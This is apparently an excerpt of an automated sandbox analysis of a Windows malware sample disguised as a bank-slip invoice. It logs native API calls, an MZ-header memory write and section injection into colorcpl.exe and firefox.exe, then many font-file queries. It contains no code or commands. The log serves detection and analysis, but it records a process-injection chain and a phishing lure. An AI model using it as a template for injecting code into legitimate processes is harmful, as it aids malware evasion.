                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory written: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 2564Jump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
